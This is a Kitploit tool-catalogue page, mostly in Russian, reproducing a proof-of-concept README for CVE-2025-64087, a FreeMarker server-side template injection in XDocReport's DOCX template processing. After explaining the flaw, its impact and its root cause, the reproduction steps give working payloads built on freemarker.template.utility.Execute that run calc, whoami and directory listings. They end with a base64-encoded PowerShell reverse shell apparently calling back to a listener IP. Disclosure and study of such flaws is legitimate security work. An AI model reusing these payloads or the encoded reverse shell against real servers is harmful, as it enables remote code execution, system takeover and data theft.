Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-64087-SSTI- — CVE-2025-64087 (SSTI) | Kitploit
Инструменты/GitHubGitHub/at190510-cuong/cve-2025-64087-ssti-
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubat190510-cuong/cve-2025-64087-ssti-

CVE-2025-64087-SSTI-

CVE-2025-64087 (SSTI)

Репозиторий
1156 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-64087 (SSTI FreeMarker)

Server-Side Template Injection (SSTI) в XDocReport, приводящая к удаленному выполнению кода через Apache FreeMarker

Bug Definition

Обзор уязвимости

  • Server-Side Template Injection (SSTI) — это уязвимость веб-безопасности, позволяющая злоумышленникам внедрять вредоносный код в шаблоны, используемые системами управления контентом (CMS) и веб-фреймворками, с целью удаленных атак, кражи конфиденциальной информации или выполнения несанкционированных действий в системе.

  • SSTI является разновидностью уязвимости внедрения (как SQL Injection, XSS и т.д.), при которой злоумышленники используют системы шаблонов для удаленного развертывания вредоносного кода. При успешной атаке SSTI злоумышленник может выполнить собственный код на стороне сервера, что позволяет проводить удаленные атаки, такие как сбор конфиденциальной информации, выполнение несанкционированных операций в системе и доступ к неавторизованным ресурсам.

  • Уязвимость SSTI часто возникает из-за использования небезопасных систем шаблонов или отсутствия проверки и обработки входных параметров перед их вставкой в шаблоны. В случае успешной атаки SSTI последствия могут быть серьезными и привести к значительному ущербу для атакованной организации.

Влияние на бизнес

  • Уязвимость SSTI может привести к множеству серьезных последствий, в том числе:

  • Выполнение вредоносного кода: злоумышленник может использовать эту уязвимость для выполнения вредоносного кода на сервере, что позволяет похитить данные, совершить незаконные действия в системе или даже полностью захватить контроль над сервером.

  • Раскрытие конфиденциальной информации: SSTI может позволить злоумышленнику читать, изменять или удалять файлы на сервере. Если эти файлы содержат конфиденциальную информацию, такую как учетные записи и пароли, злоумышленник может легко получить к ней доступ.

  • Угрозы или фишинг пользователей: злоумышленник может использовать SSTI для проведения угроз или фишинговых атак, изменяя содержимое веб-страницы или добавляя поддельные кастомные кнопки. Если пользователь нажмет на эти кнопки, злоумышленник может похитить его данные или установить вредоносное ПО на его компьютер.

Severity: CRITICAL

image

Description and Impact

A Server-Side Template Injection (SSTI) vulnerability was found in OpenSAGRES XDocReport when processing DOCX templates with the FreeMarker engine. Under certain configurations, crafted templates can lead to Remote Code Execution (RCE).

Веб-приложение для управления персоналом позволяет пользователям загружать файлы документов .docx в систему. В процессе обработки приложение использует шаблонизатор FreeMarker (в файле FreemarkerTemplateEngine.java) для рендеринга содержимого ${"freemarker.template.utility.Execute"?new()("whoami")} без механизма контроля или фильтрации входных данных. Эта уязвимость позволяет злоумышленнику вставлять вредоносные выражения в файл .docx (шаблон), что приводит к удаленному выполнению кода (RCE) на сервере и может быть использовано для кражи информации или захвата управления системой.

Affected component

fr.opensagres.xdocreport.template.freemarker — XDocReport (версии 1.0.0 – 2.1.0).

Root cause analysis

  • В файле https://github.com/opensagres/xdocreport/blob/master/template/fr.opensagres.xdocreport.template.freemarker/src/main/java/fr/opensagres/xdocreport/template/freemarker/FreemarkerTemplateEngine.java не выполняется проверка содержимого входного файла xdoc. Содержимое шаблона загружается напрямую и передается в process(context, writer, template) для обработки движком FreeMarker без изолированной среды (sandboxing) или ограничений на директивы/выражения. В результате злоумышленник может предоставить шаблон, содержащий вредоносные выражения/команды FreeMarker, что приводит к удаленному выполнению кода (RCE).

image

Step to reproduce

  1. Пользователь загружает файл .docx, содержимое которого представляет собой следующий payload:``` ${"freemarker.template.utility.Execute"?new()("calc")}
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

2. Видим, что выполнение прошло успешно и открылось приложение calc

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

3. Аналогично, чтобы получить информацию о пользователе, работающем в системе, с помощью payload:```
${"freemarker.template.utility.Execute"?new()("whoami")}

image

image

  1. Можно увидеть, что файл .docx после обработки шаблонизатором вернул данные системы.

image

  1. Аналогично со следующим payload:``` ${"freemarker.template.utility.Execute"?new()("cmd /c dir d:")}
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

6. Повышение воздействия до RCE

- Слушающая машина — wsl с IP-адресом `172.26.208.130`

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

- Эксплуатация с помощью следующей полезной нагрузки:

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)```java
${"freemarker.template.utility.Execute"?new()("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAyADYALgAyADAAOAAuADEAMwAwACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==")}

image

  • Передача файла .docx в xdocreport для обработки
Скачать инструмент